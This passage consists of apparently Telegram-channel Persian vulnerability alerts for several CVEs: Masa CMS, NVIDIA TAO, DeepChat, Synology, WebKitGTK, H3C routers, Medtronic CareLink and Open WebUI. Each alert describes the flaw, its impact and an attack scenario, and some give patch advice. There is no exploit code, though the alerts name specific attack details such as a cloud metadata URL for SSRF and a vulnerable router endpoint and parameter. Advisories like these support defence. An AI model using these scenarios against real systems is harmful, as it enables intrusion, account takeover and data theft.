سرور Masa CMS درخواست را پردازش کرده و تابع setDynamicContent پی‌لود مخرب را به عنوان کد معتبر اجرا می‌کند. در نتیجه، اسکریپت Reverse Shell روی سرور اجرا شده و یک ارتباط مستقیم با دستگاه مهاجم برقرار می‌کند.

در این لحظه، مهاجم به یک خط فرمان (Shell) روی سرور دسترسی پیدا کرده و می‌تواند هر دستوری را با سطح دسترسی پروسه وب‌سرور اجرا کند و کنترل سیستم را در دست بگیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2024-32642

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری | CVE-2024-32642
یک آسیب‌پذیری حیاتی از نوع Host Header Poisoning در سیستم مدیریت محتوای Masa CMS شناسایی شده است که می‌تواند منجر به تصاحب حساب کاربری شود.

📄 توضیحات آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2024-32642 در سیستم مدیریت محتوای متن‌باز Masa CMS وجود دارد. این ضعف امنیتی در نسخه‌های پیش از 7.2.8، 7.3.13 و 7.4.6 یافت می‌شود. مشکل اصلی این است که برنامه هنگام تولید لینک‌های بازنشانی رمز عبور، به هدر Host ارسالی در درخواست HTTP به صورت ناامن اعتماد می‌کند. این امر به مهاجم اجازه می‌دهد تا یک هدر Host جعلی را به سرور ارسال کرده و برنامه را فریب دهد تا لینکی با دامنه تحت کنترل مهاجم ایجاد کند.

💥 تأثیر:
تأثیر اصلی این آسیب‌پذیری تصاحب کامل حساب کاربری (Account Takeover) است. اگر حساب مورد هدف دارای دسترسی مدیریتی باشد، مهاجم می‌تواند کنترل کامل سیستم را به دست آورد. پیامدهای احتمالی عبارتند از:
- سرقت اطلاعات حساس
- دستکاری یا حذف محتوای وب‌سایت
- اجرای حملات بیشتر از طریق دسترسی به دست آمده

⚙️ سناریوی حمله:
۱. مهاجم فرآیند "فراموشی رمز عبور" را برای حساب یک کاربر (قربانی) آغاز می‌کند.

۲. همزمان، یک هدر Host مخرب در درخواست HTTP به سمت سرور ارسال می‌کند که به دامنه تحت کنترل خودش اشاره دارد.

۳. سیستم Masa CMS، لینک بازنشانی رمز عبور را با استفاده از دامنه جعلی مهاجم تولید کرده و آن را از طریق ایمیل برای قربانی ارسال می‌کند.

۴. قربانی ایمیل را دریافت کرده و با تصور اینکه لینک معتبر است، روی آن کلیک می‌کند.

۵. با کلیک بر روی لینک، توکن (token) محرمانه بازنشانی رمز عبور به سرور مهاجم ارسال می‌شود.

۶. مهاجم توکن را ضبط کرده و از آن برای تنظیم یک رمز عبور جدید برای حساب قربانی و تصاحب کامل آن استفاده می‌کند.

---
🛡️ راهکار و اصلاحیه:
توسعه‌دهندگان Masa CMS اصلاحیه‌های امنیتی را منتشر کرده‌اند. به تمام کاربران اکیداً توصیه می‌شود که سیستم خود را در اسرع وقت به یکی از نسخه‌های امن زیر به‌روزرسانی کنند:
- 7.2.8
- 7.3.13
- 7.4.6
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-33208

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل خلاصه آسیب‌پذیری: CVE-2025-33208

این گزارش به تحلیل آسیب‌پذیری شناسایی‌شده در پلتفرم NVIDIA TAO می‌پردازد که می‌تواند منجر به اجرای کد از راه دور و به خطر افتادن سیستم شود.

---

شرح آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2025-33208 در فریم‌ورک NVIDIA TAO وجود دارد. این ضعف امنیتی از نوع Uncontrolled Search Path است. به این معنی که برنامه هنگام فراخوانی یک منبع (مانند یک فایل کتابخانه‌ای یا DLL)، مسیر کامل و امن آن را مشخص نمی‌کند و در عوض، آن را در مسیرهای مختلفی جستجو می‌کند. یک مهاجم می‌تواند با قرار دادن یک فایل مخرب با نام مشابه در یکی از این مسیرهای جستجو، برنامه را فریب دهد تا به جای فایل اصلی، فایل مخرب را بارگذاری و اجرا کند.

تاثیرات:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به طیف وسیعی از پیامدهای امنیتی شدید شود:

* افزایش سطح دسترسی (EoP): اگر برنامه TAO با دسترسی‌های بالا (مانند ادمین) اجرا شود، کد مخرب مهاجم نیز با همان سطح دسترسی اجرا خواهد شد.

* دستکاری داده‌ها: مهاجم می‌تواند داده‌های حساس، مدل‌های هوش مصنوعی یا فایل‌های پروژه‌ای که برنامه در حال پردازش آن‌هاست را تغییر داده یا تخریب کند.

* منع سرویس (DoS): اجرای کد مخرب می‌تواند منجر به از کار افتادن برنامه یا حتی کل سیستم عامل شود.

* افشای اطلاعات: کد مهاجم می‌تواند به اطلاعات حساسی که برنامه به آن‌ها دسترسی دارد (مانند کلیدهای API، داده‌های آموزشی یا اطلاعات کاربری) دسترسی پیدا کرده و آن‌ها را به سرقت ببرد.

سناریوی حمله:
یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

1. مهاجم یک فایل مخرب (به عنوان مثال، یک فایل .dll با نامی عمومی مانند version.dll) را ایجاد می‌کند.

2. مهاجم از طریق مهندسی اجتماعی، کاربر را متقاعد می‌کند تا این فایل مخرب را در یک پوشه خاص، برای مثال پوشه دانلودها (Downloads)، ذخیره کند. در کنار این فایل، ممکن است یک فایل پروژه مربوط به TAO نیز قرار داده شود.

3. سپس کاربر فریب داده می‌شود تا برنامه NVIDIA TAO را از داخل همان پوشه (پوشه Downloads) اجرا کند یا فایل پروژه موجود در آن را باز کند.

4. هنگامی که برنامه TAO شروع به کار می‌کند، برای بارگذاری فایل version.dll، ابتدا پوشه فعلی را جستجو می‌کند. در این لحظه، نسخه مخرب فایل را پیدا کرده و آن را به جای نسخه اصلی و سیستمی، بارگذاری و اجرا می‌کند.

5. در نتیجه، کد مخرب مهاجم با سطح دسترسی برنامه TAO بر روی سیستم قربانی اجرا می‌شود و می‌تواند عملیات مورد نظر خود را (مانند نصب باج‌افزار یا سرقت اطلاعات) انجام دهد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-66222

🔴 Risk Level: CRITICAL (Score: 9.6)

تحلیل آسیب‌پذیری بحرانی: اجرای کد از راه دور در DeepChat
CVE-2025-66222

---

Vulnerability Description:
یک آسیب‌پذیری از نوع Stored Cross-Site Scripting (XSS) در کامپوننت پردازش دیاگرام‌های Mermaid در دستیار هوشمند DeepChat شناسایی شده است. نسخه‌های 0.5.0 و قدیمی‌تر تحت تأثیر این ضعف امنیتی قرار دارند.

این آسیب‌پذیری به یک مهاجم اجازه می‌دهد تا با تزریق کدهای جاوا اسکریپت مخرب در محتوای یک دیاگرام، آن کد را در بستر برنامه و بر روی سیستم سایر کاربرانی که آن دیاگرام را مشاهده می‌کنند، اجرا نماید.

Impact:
خطر اصلی این آسیب‌پذیری در قابلیت ارتقاء آن به سطح اجرای کد از راه دور (Remote Code Execution - RCE) نهفته است. مهاجم می‌تواند با بهره‌برداری از یک پل ارتباطی ناامن Electron IPC که در برنامه وجود دارد، یک سرور مخرب MCP (Model Context Protocol) را بر روی سیستم قربانی ثبت و اجرا کند.

موفقیت در این حمله به معنای در اختیار گرفتن کامل سیستم قربانی، سرقت اطلاعات حساس، نصب بدافزار و اجرای دستورات دلخواه توسط مهاجم خواهد بود. این آسیب‌پذیری دارای سطح بحرانی (Critical) است.

Scenario:
یک سناریوی حمله محتمل می‌تواند به شرح زیر باشد:

۱. مهاجم یک دیاگرام Mermaid حاوی پی‌لود مخرب XSS را طراحی کرده و آن را در یک چت یا مستند در پلتفرم DeepChat به اشتراک می‌گذارد.

۲. قربانی (کاربر دیگر) صفحه حاوی این دیاگرام را باز می‌کند. در این لحظه، کد جاوا اسکریپت مخرب در بستر (Context) اپلیکیشن DeepChat بر روی سیستم قربانی اجرا می‌شود.

۳. کد XSS اجرا شده، از طریق پل ارتباطی ناامن Electron IPC با پروسه‌های اصلی برنامه ارتباط برقرار کرده و دستورات مخرب را به آن‌ها ارسال می‌کند.

۴. در نهایت، این دستورات منجر به ثبت و راه‌اندازی یک سرور MCP جعلی بر روی دستگاه قربانی شده و به مهاجم دسترسی کامل برای اجرای کد از راه دور را می‌دهد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2024-45538

🔴 Risk Level: CRITICAL (Score: 9.6)

تحلیل آسیب‌پذیری بحرانی در محصولات Synology
CVE-2024-45538

آسیب‌پذیری:
یک آسیب‌پذیری از نوع جعل درخواست بین سایتی (Cross-Site Request Forgery - CSRF) در فریمورک WebAPI محصولات سینولوژی شناسایی شده است. این ضعف امنیتی به مهاجم از راه دور اجازه می‌دهد تا با فریب دادن یک کاربر احرازهویت شده، دستورات دلخواه خود را بر روی دستگاه اجرا کند.

محصولات و نسخه‌های تحت تأثیر:
• Synology DiskStation Manager (DSM) قبل از 7.2.1-69057-2 و 7.2.2-72806
• Synology Unified Controller (DSMUC) قبل از 3.1.4-23079

---

تأثیر:
مهم‌ترین و خطرناک‌ترین پیامد این آسیب‌پذیری، اجرای کد از راه دور (RCE) با دسترسی‌های سطح بالا بر روی دستگاه است. مهاجم می‌تواند:

• کنترل کامل دستگاه را به دست گیرد.
• به تمامی اطلاعات ذخیره شده دسترسی پیدا کرده و آن‌ها را سرقت کند.
• بدافزار یا باج‌افزار بر روی سیستم نصب کند.
• از دستگاه به عنوان یک پایگاه برای حملات بیشتر به شبکه داخلی استفاده نماید.

---

سناریو:
یک سناریوی حمله محتمل به شرح زیر است:

۱. طراحی تله: مهاجم یک لینک، ایمیل یا صفحه وب مخرب طراحی می‌کند که حاوی یک درخواست جعلی به پنل مدیریت DSM است.

۲. قربانی: کاربر (مدیر سیستم) که در مرورگر خود به پنل وب دستگاه Synology خود لاگین کرده است، فریب خورده و بر روی لینک مخرب کلیک می‌کند یا از صفحه وب آلوده بازدید می‌نماید.

۳. سوءاستفاده: مرورگر قربانی، بدون اطلاع وی، درخواست جعلی را به همراه کوکی‌های احرازهویت به دستگاه Synology ارسال می‌کند. به دلیل وجود آسیب‌پذیری CSRF، دستگاه این درخواست را به عنوان یک فرمان معتبر از طرف مدیر سیستم می‌پذیرد.

۴. نتیجه: کد مخرب تعبیه شده توسط مهاجم بر روی دستگاه اجرا شده و کنترل کامل آن در اختیار مهاجم قرار می‌گیرد.

توصیه اکید می‌شود که کاربران محصولات مذکور در اسرع وقت دستگاه‌های خود را به آخرین نسخه‌های ارائه شده توسط Synology به‌روزرسانی کنند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-66287

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری: CVE-2025-66287

🛡️ شرح آسیب‌پذیری:
یک نقص امنیتی در موتور رندر وب WebKitGTK شناسایی شده است. این آسیب‌پذیری که با کد CVE-2025-66287 ردیابی می‌شود، به دلیل مدیریت نادرست حافظه (Improper Memory Handling) هنگام پردازش محتوای وب مخرب به وجود می‌آید.

موتور WebKitGTK در بسیاری از برنامه‌های لینوکسی برای نمایش محتوای وب استفاده می‌شود. این آسیب‌پذیری به مهاجم اجازه می‌دهد تا با ساخت یک صفحه وب خاص، باعث از کار افتادن (Crash) ناگهانی برنامه‌ای شود که از این موتور استفاده می‌کند.

💥 تأثیر:
تأثیر اصلی این آسیب‌پذیری، اجرای یک حمله محروم‌سازی از سرویس (Denial of Service - DoS) است. هنگامی که کاربر از طریق یک برنامه آسیب‌پذیر (مانند یک مرورگر وب یا کلاینت ایمیل) محتوای مخرب را باز می‌کند، برنامه به طور کامل بسته شده و از کار می‌افتد.

این اتفاق منجر به اختلال در کار کاربر و از دست رفتن احتمالی داده‌های ذخیره‌نشده می‌شود. اگرچه در توضیحات رسمی فقط به کرش اشاره شده، اما نقص‌های مربوط به مدیریت حافظه در موارد پیچیده‌تر می‌توانند پتانسیل اجرای کد از راه دور (RCE) را نیز فراهم کنند، هرچند این مورد برای این CVE تأیید نشده است.

🎭 سناریو:
یک مهاجم یک صفحه وب با کدهای HTML یا JavaScript دستکاری‌شده و مخرب ایجاد می‌کند.

سپس، مهاجم با استفاده از روش‌های مهندسی اجتماعی (مانند ارسال یک ایمیل فیشینگ یا یک پیام در شبکه‌های اجتماعی)، قربانی را ترغیب به کلیک کردن روی لینک آن صفحه وب می‌کند.

به محض اینکه برنامه آسیب‌پذیر روی سیستم قربانی (که از WebKitGTK استفاده می‌کند) تلاش می‌کند این محتوای مخرب را پردازش و نمایش دهد، باگ مدیریت حافظه فعال شده و باعث کرش کردن و بسته شدن ناگهانی برنامه می‌شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-14015

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل و گزارش خلاصه آسیب‌پذیری
CVE-2025-14015

---

شرح آسیب‌پذیری:
یک ضعف امنیتی از نوع سرریز بافر (Buffer Overflow) در روترهای H3C Magic B0 تا نسخه فریم‌ور 100R002 شناسایی شده است. این آسیب‌پذیری در تابع EditWlanMacList واقع در فایل /goform/aspForm وجود دارد.

مهاجم از راه دور می‌تواند با ارسال یک درخواست دستکاری‌شده به این فایل و ارسال مقادیر مخرب در پارامتر param، باعث سرریز بافر شده و کنترل دستگاه را در دست بگیرد.

تأثیر:
موفقیت‌آمیز بودن این حمله به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution) بر روی روتر را می‌دهد. این به معنای در اختیار گرفتن کامل دستگاه است.

پیامدهای اصلی عبارتند از:
- شنود و سرقت تمام ترافیک اینترنت (شامل نام‌های کاربری و رمزهای عبور).
- هدایت کاربران به صفحات فیشینگ و بدافزار.
- استفاده از روتر برای حمله به سایر دستگاه‌های موجود در شبکه داخلی.
- افزودن دستگاه به یک شبکه بات‌نت (Botnet).

سناریو حمله:
۱. مهاجم یک روتر آسیب‌پذیر H3C را در شبکه شناسایی می‌کند.

۲. یک درخواست وب مخرب به پنل مدیریتی دستگاه، به طور خاص به مسیر /goform/aspForm ارسال می‌کند.

۳. در این درخواست، مقداری بسیار طولانی و دستکاری‌شده برای پارامتر param قرار داده می‌شود تا تابع EditWlanMacList را هدف قرار دهد.

۴. این عمل باعث سرریز بافر شده و کد مخرب مهاجم بر روی سیستم‌عامل روتر اجرا می‌شود.

مهم: کد بهره‌برداری (Exploit) این آسیب‌پذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است. این موضوع ریسک بهره‌برداری را به شدت افزایش می‌دهد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-12995

🟠 Risk Level: HIGH (Score: 8.1)

تحلیل آسیب‌پذیری CVE-2025-12995

شرح آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2025-12995 در شبکه CareLink محصول شرکت Medtronic شناسایی شده است. این ضعف امنیتی به یک مهاجم راه دور و احراز هویت نشده اجازه می‌دهد تا یک حمله Brute Force را بر روی یک نقطه پایانی API (API Endpoint) اجرا کند. هدف از این حمله، حدس زدن و کشف یک رمز عبور معتبر در سیستم است که تحت شرایط خاصی امکان‌پذیر می‌شود.

نسخه‌های تحت تأثیر، تمام ورژن‌های شبکه CareLink قبل از تاریخ ۴ دسامبر ۲۰۲۵ می‌باشند.

تأثیر:
موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به موارد زیر شود:

دسترسی غیرمجاز: کشف رمز عبور کاربران و به دست گرفتن کنترل حساب‌های آن‌ها.

افشای اطلاعات حساس: دسترسی به داده‌های پزشکی و اطلاعات هویتی بیماران (PHI) که در شبکه CareLink ذخیره شده‌اند.

تشدید حملات: امکان سوءاستفاده از حساب‌های به سرقت رفته برای اجرای حملات بیشتر یا دستکاری اطلاعات در سیستم.

سناریوی حمله:
یک مهاجم، نقطه پایانی API آسیب‌پذیر را در یکی از سرورهای شبکه Medtronic CareLink که در اینترنت قابل دسترس است، شناسایی می‌کند.

سپس با استفاده از ابزارهای خودکار، لیستی از رمزهای عبور متداول (Password List) را به صورت مکرر و با سرعت بالا به این API ارسال می‌کند تا بتواند رمز عبور یک حساب کاربری معتبر را حدس بزند.

از آنجایی که مکانیزم‌های حفاظتی مانند محدودیت نرخ درخواست (Rate Limiting) یا قفل شدن حساب کاربری به درستی پیاده‌سازی نشده‌اند، حمله Brute Force بدون مانع ادامه می‌یابد.

در نهایت، مهاجم موفق به کشف یک رمز عبور صحیح شده و با استفاده از آن، به سیستم وارد می‌شود و به اطلاعات حساس بیماران دسترسی پیدا می‌کند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-65958

🟠 Risk Level: HIGH (Score: 8.5)

تحلیل آسیب‌پذیری CVE-2025-65958 در Open WebUI

---

آسیب‌پذیری:
یک آسیب‌پذیری از نوع جعل درخواست سمت سرور (Server-Side Request Forgery - SSRF) با شناسه CVE-2025-65958 در پلتفرم هوش مصنوعی Open WebUI شناسایی شده است. این پلتفرم که برای کار به صورت کاملاً آفلاین طراحی شده، در نسخه‌های قبل از 0.6.37 به هر کاربر احرازهویت‌شده (حتی با کمترین سطح دسترسی) اجازه می‌دهد تا سرور را وادار به ارسال درخواست‌های HTTP به آدرس‌های دلخواه کند. این ضعف امنیتی به مهاجم اجازه می‌دهد تا از سرور به عنوان یک پروکسی برای تعامل با شبکه‌های داخلی یا سرویس‌های خارجی استفاده کند.

تأثیر:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به عواقب جدی امنیتی شود. مهاجم قادر خواهد بود:
- به متادیتاهای سرویس‌های ابری (مانند AWS, GCP, Azure) دسترسی پیدا کرده و اطلاعات حساس مانند کلیدهای دسترسی را سرقت کند.
- شبکه‌های داخلی سازمان را پویش (Scan) کرده و سرویس‌ها و پورت‌های باز را شناسایی کند.
- به سرویس‌های داخلی که پشت فایروال قرار دارند و از اینترنت قابل دسترس نیستند، دسترسی پیدا کند.
- اطلاعات حساس را از سرویس‌های داخلی که سرور به آنها دسترسی دارد، استخراج و سرقت نماید.

سناریو:
یک مهاجم با یک حساب کاربری عادی در یک نمونه آسیب‌پذیر از Open WebUI لاگین می‌کند. سپس با سوءاستفاده از قابلیت آسیب‌پذیر، درخواستی را به سرور ارسال می‌کند که هدف آن آدرس متادیتای سرور ابری میزبان است (برای مثال: https://169.254.169.254/latest/meta-data/). سرور Open WebUI این درخواست را به عنوان یک درخواست معتبر از طرف خود اجرا کرده و پاسخ را که می‌تواند حاوی کلیدهای دسترسی موقت باشد، به مهاجم برمی‌گرداند. مهاجم با در اختیار داشتن این کلیدها، می‌تواند به منابع ابری سازمان دسترسی غیرمجاز پیدا کند.

توصیه اکید می‌شود مدیران سیستم فوراً نسبت به به‌روزرسانی Open WebUI به نسخه 0.6.37 یا بالاتر اقدام نمایند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal